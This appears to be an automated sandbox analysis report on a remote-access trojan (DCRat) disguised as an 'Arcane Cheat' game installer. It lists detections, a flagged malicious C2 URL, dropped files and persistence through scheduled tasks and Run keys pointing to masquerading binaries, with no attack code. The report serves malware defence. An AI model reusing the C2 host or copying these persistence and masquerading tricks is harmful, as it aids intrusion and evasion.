            Source: Yara matchFile source: 00000026.00000002.2564245326.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.2426637115.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1869897360.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.2514657098.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.2514657098.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.2426637115.000000000290E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1869897360.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2381409608.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1914350978.0000000012ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: browserwinsvc.exe PID: 6456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 7080, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 3196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6092, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1196, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000007.00000002.1869897360.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2564245326.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.2426637115.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1869897360.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.2514657098.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.2514657098.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.2426637115.000000000290E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1869897360.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2381409608.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1914350978.0000000012ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: browserwinsvc.exe PID: 6456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 7080, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 3196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6092, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1196, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		Valid Accounts11
            Windows Management Instrumentation            		11
            Scripting            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		OS Credential Dumping1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		11
            Process Injection            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory2
            File and Directory Discovery            		Remote Desktop ProtocolData from Removable Media1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts3
            Command and Scripting Interpreter            		1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		3
            Obfuscated Files or Information            		Security Account Manager47
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Scheduled Task/Job            		411
            Registry Run Keys / Startup Folder            		411
            Registry Run Keys / Startup Folder            		22
            Software Packing            		NTDS121
            Security Software Discovery            		Distributed Component Object ModelInput Capture12
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets1
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts223
            Masquerading            		Cached Domain Credentials41
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
            Virtualization/Sandbox Evasion            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection            		Proc Filesystem2
            System Owner/User Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447650 Sample: uChcvn3L6R.exe Startdate: 26/05/2024 Architecture: WINDOWS Score: 92 80 ip-api.com 2->80 84 Snort IDS alert for network traffic 2->84 86 Multi AV Scanner detection for domain / URL 2->86 88 Found malware configuration 2->88 90 15 other signatures 2->90 12 uChcvn3L6R.exe 3 2->12         started        15 audiodg.exe 2->15         started        17 audiodg.exe 2->17         started        19 2 other processes 2->19 signatures3 process4 file5 68 C:\Users\user\...\Arcane CheatSetup.exe, PE32 12->68 dropped 70 C:\Users\user\AppData\...\Arcane Cheat.exe, PE32 12->70 dropped 21 Arcane Cheat.exe 3 6 12->21         started        24 Arcane CheatSetup.exe 2 12->24         started        process6 file7 64 C:\...\browserwinsvc.exe, PE32 21->64 dropped 26 wscript.exe 1 21->26         started        66 C:\Users\user\...\Arcane CheatSetup.tmp, PE32 24->66 dropped 29 Arcane CheatSetup.tmp 23 247 24->29         started        process8 file9 102 Windows Scripting host queries suspicious COM object (likely to drop second stage) 26->102 104 Suspicious execution chain found 26->104 32 cmd.exe 1 26->32         started        72 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 29->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 29->74 dropped 76 C:\...\unins000.exe (copy), PE32 29->76 dropped 78 189 other files (none is malicious) 29->78 dropped 106 Creates autostart registry keys to launch java 29->106 signatures10 process11 process12 34 browserwinsvc.exe 23 20 32->34         started        39 conhost.exe 32->39         started        dnsIp13 82 ip-api.com 208.95.112.1, 49730, 49731, 80 TUT-ASUS United States 34->82 56 C:\Windows\addins\audiodg.exe, PE32 34->56 dropped 58 C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe, PE32 34->58 dropped 60 C:\...\qiOZcVoixJLcuAFKAnRd.exe, PE32 34->60 dropped 62 5 other files (3 malicious) 34->62 dropped 92 Creates an undocumented autostart registry key 34->92 94 Creates multiple autostart registry keys 34->94 96 Creates an autostart registry key pointing to binary in C:\Windows 34->96 98 4 other signatures 34->98 41 powershell.exe 34->41         started        44 powershell.exe 34->44         started        46 powershell.exe 34->46         started        48 3 other processes 34->48 file14 signatures15 process16 signatures17 100 Loading BitLocker PowerShell Module 41->100 50 conhost.exe 41->50         started        52 conhost.exe 44->52         started        54 conhost.exe 46->54         started        process18

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            uChcvn3L6R.exe92%ReversingLabsWin32.Trojan.Dorv
            uChcvn3L6R.exe79%VirustotalBrowse
            uChcvn3L6R.exe100%AviraVBS/Runner.VPG
            uChcvn3L6R.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe (copy)3%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\is-5H46A.tmp3%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\is-5H46A.tmp0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\is-8NKS2.tmp3%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\is-8NKS2.tmp0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge-32.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge-32.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge-32.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge-32.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\awt.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\awt.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\bci.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\bci.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\client\is-KHA4M.tmp0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\client\is-KHA4M.tmp0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\client\jvm.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\client\jvm.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dcpr.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dcpr.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\decora_sse.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\decora_sse.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\deploy.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\deploy.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_shmem.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_shmem.dll (copy)0%VirustotalBrowse
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_socket.dll (copy)0%ReversingLabs
            C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_socket.dll (copy)0%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            ip-api.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.innosetup.com/0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU0%URL Reputationsafe
            http://ocsp.thawte.com00%URL Reputationsafe
            http://ocsp.thawte.com00%URL Reputationsafe
            http://bugreport.sun.com/bugreport/0%URL Reputationsafe
            http://java.oracle.com/0%URL Reputationsafe
            http://www.symauth.com/cps0(0%URL Reputationsafe
            http://www.dk-soft.org/0%URL Reputationsafe
            http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
            http://www.symauth.com/rpa000%URL Reputationsafe
            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
            http://ip-api.com0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://www.remobjects.com/ps0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
            http://ocsp.example.net:800%Avira URL Cloudsafe
            http://go.micN0%Avira URL Cloudsafe
            http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb100%Avira URL Cloudmalware
            http://www.oracle.com/technetwork/java/javaseproducts/C:0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            http://openjdk.java.net/jeps/220).0%Avira URL Cloudsafe
            http://www.oracle.com/hotspot/jvm/vm/compiler/id0%Avira URL Cloudsafe
            http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb15%VirustotalBrowse
            https://github.com/Pester/Pester1%VirustotalBrowse
            http://www.oracle.com/hotspot/jvm/vm/gc/id0%Avira URL Cloudsafe
            http://ocsp.example.net:800%VirustotalBrowse
            http://www.oracle.com/technetwork/java/javase/overview/0%Avira URL Cloudsafe
            http://counter-strike.com.ua/0%Avira URL Cloudsafe
            http://www.oracle.com/hotspot/jvm/vm/compiler/id0%VirustotalBrowse
            http://www.oracle.com/hotspot/jvm/vm/gc/id0%VirustotalBrowse
            http://www.oracle.com/technetwork/java/javaseproducts/0%Avira URL Cloudsafe
            http://www.oracle.com/technetwork/java/javaseproducts/C:0%VirustotalBrowse
            http://www.oracle.com/technetwork/java/javase/overview/0%VirustotalBrowse
            http://counter-strike.com.ua/0%VirustotalBrowse
            http://www.oracle.com/hotspot/jvm/java/monitor/address0%Avira URL Cloudsafe
            http://download.oracle.com/javase/7/docs/technotes/guides/plugin/0%Avira URL Cloudsafe
            http://www.oracle.com/hotspot/jvm/0%Avira URL Cloudsafe
            http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id0%Avira URL Cloudsafe
            http://openjdk.java.net/jeps/220).0%VirustotalBrowse
            http://www.oracle.com/technetwork/java/javaseproducts/0%VirustotalBrowse
            http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.ven0%Avira URL Cloudsafe
            http://www.oracle.com/hotspot/jvm/java/monitor/address0%VirustotalBrowse
            http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id0%VirustotalBrowse
            http://www.oracle.com/hotspot/jvm/0%VirustotalBrowse
            http://download.oracle.com/javase/7/docs/technotes/guides/plugin/0%VirustotalBrowse
            http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.ven0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ip-api.com
            		208.95.112.1
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnbtrue
            • 15%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://ip-api.com/line/?fields=hostingfalse
            • URL Reputation: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.innosetup.com/Arcane CheatSetup.exe, 00000001.00000003.1705276766.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.exe, 00000001.00000003.1709172010.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.tmp, 00000002.00000000.1713179499.0000000000401000.00000020.00000001.01000000.00000006.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://go.micNexplorer.exe, 00000028.00000002.2415528614.0000000000D34000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000031.00000002.2021882482.0000019F58EB8000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: malware
            		unknown
            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000029.00000002.2077921372.0000022C975E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1964510418.000001C080228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1952888234.0000020400228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2053761030.000001D25E368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2021882482.0000019F58EB8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000031.00000002.2021882482.0000019F58EB8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://ocsp.example.net:80is-8FS1L.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUuChcvn3L6R.exefalse
            • URL Reputation: safe
            		unknown
            http://ocsp.thawte.com0is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://bugreport.sun.com/bugreport/is-LS3UA.tmp.2.drfalse
            • URL Reputation: safe
            		unknown
            http://java.oracle.com/is-LS3UA.tmp.2.drfalse
            • URL Reputation: safe
            		unknown
            http://www.oracle.com/technetwork/java/javaseproducts/C:is-KHA4M.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.symauth.com/cps0(is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drfalse
            • URL Reputation: safe
            		unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000031.00000002.2021882482.0000019F58EB8000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://openjdk.java.net/jeps/220).is-KHA4M.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.dk-soft.org/Arcane CheatSetup.exe, 00000001.00000003.1704112001.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.tmp, 00000002.00000003.1721377728.00000000031A0000.00000004.00001000.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.thawte.com/ThawteTimestampingCA.crl0is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drfalse
            • URL Reputation: safe
            		unknown
            http://www.oracle.com/hotspot/jvm/vm/compiler/idis-KHA4M.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.oracle.com/hotspot/jvm/vm/gc/idis-KHA4M.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.symauth.com/rpa00is-DLMB6.tmp.2.dr, is-RMB9M.tmp.2.dr, is-LS3UA.tmp.2.dr, is-069DQ.tmp.2.dr, is-G1B5Q.tmp.2.dr, is-O5MSC.tmp.2.drfalse
            • URL Reputation: safe
            		unknown
            http://www.oracle.com/technetwork/java/javase/overview/is-NCUG3.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000029.00000002.2077921372.0000022C975E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1964510418.000001C080228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1952888234.0000020400228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2053761030.000001D25E368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2021882482.0000019F58EB8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://ip-api.combrowserwinsvc.exe, 00000007.00000002.1869897360.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, browserwinsvc.exe, 00000007.00000002.1869897360.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, browserwinsvc.exe, 00000007.00000002.1869897360.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://counter-strike.com.ua/Arcane CheatSetup.exe, 00000001.00000003.1704112001.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.tmp, 00000002.00000003.1721377728.00000000031A0000.00000004.00001000.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.oracle.com/technetwork/java/javaseproducts/is-KHA4M.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://aka.ms/pscore68powershell.exe, 00000029.00000002.2077921372.0000022C973C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1964510418.000001C080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1952888234.0000020400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2053761030.000001D25E141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2021882482.0000019F58C91000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.oracle.com/hotspot/jvm/java/monitor/addressis-KHA4M.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.remobjects.com/psArcane CheatSetup.exe, 00000001.00000003.1705276766.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.exe, 00000001.00000003.1709172010.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, Arcane CheatSetup.tmp, 00000002.00000000.1713179499.0000000000401000.00000020.00000001.01000000.00000006.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebrowserwinsvc.exe, 00000007.00000002.1869897360.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2077921372.0000022C973C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1964510418.000001C080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1952888234.0000020400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2053761030.000001D25E141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2021882482.0000019F58C91000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.oracle.com/hotspot/jvm/is-KHA4M.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://download.oracle.com/javase/7/docs/technotes/guides/plugin/is-NCUG3.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.oracle.com/hotspot/jvm/vm/code_sweeper/idis-KHA4M.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.venis-LS3UA.tmp.2.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            208.95.112.1
            		ip-api.comUnited States
            		53334TUT-ASUStrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1447650
            Start date and time:2024-05-26 10:01:10 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 11m 6s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:50
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Sample name:uChcvn3L6R.exe
            renamed because original name is a hash value
            Original Sample Name:236b78f3cd3a0b771d318f044dda8f45.exe
            Detection:MAL
            Classification:mal92.troj.expl.evad.winEXE@41/475@1/1
            EGA Information:
            • Successful, ratio: 16.7%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): schtasks.exe
            • Excluded domains from analysis (whitelisted): 729231cm.n9shteam1.top, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ipinfo.io, ctldl.windowsupdate.com, api.telegram.org, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target audiodg.exe, PID 3196 because it is empty
            • Execution Graph export aborted for target audiodg.exe, PID 7080 because it is empty
            • Execution Graph export aborted for target browserwinsvc.exe, PID 6456 because it is empty
            • Execution Graph export aborted for target explorer.exe, PID 1196 because it is empty
            • Execution Graph export aborted for target explorer.exe, PID 6092 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            04:02:13API Interceptor1x Sleep call for process: browserwinsvc.exe modified
            04:02:18API Interceptor131x Sleep call for process: powershell.exe modified
            09:02:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
            09:02:12Task SchedulerRun new task: audiodg path: "C:\Windows\addins\audiodg.exe"
            09:02:12Task SchedulerRun new task: audiodga path: "C:\Windows\addins\audiodg.exe"
            09:02:12Task SchedulerRun new task: explorer path: "C:\Recovery\explorer.exe"
            09:02:12Task SchedulerRun new task: explorere path: "C:\Recovery\explorer.exe"
            09:02:12Task SchedulerRun new task: qiOZcVoixJLcuAFKAnRd path: "C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe"
            09:02:13Task SchedulerRun new task: qiOZcVoixJLcuAFKAnRdq path: "C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe"
            09:02:14Task SchedulerRun new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
            09:02:17Task SchedulerRun new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
            09:02:19Task SchedulerRun new task: WinStore.App path: "C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe"
            09:02:20Task SchedulerRun new task: WinStore.AppW path: "C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe"
            09:02:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Windows\addins\audiodg.exe"
            09:02:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRd "C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe"
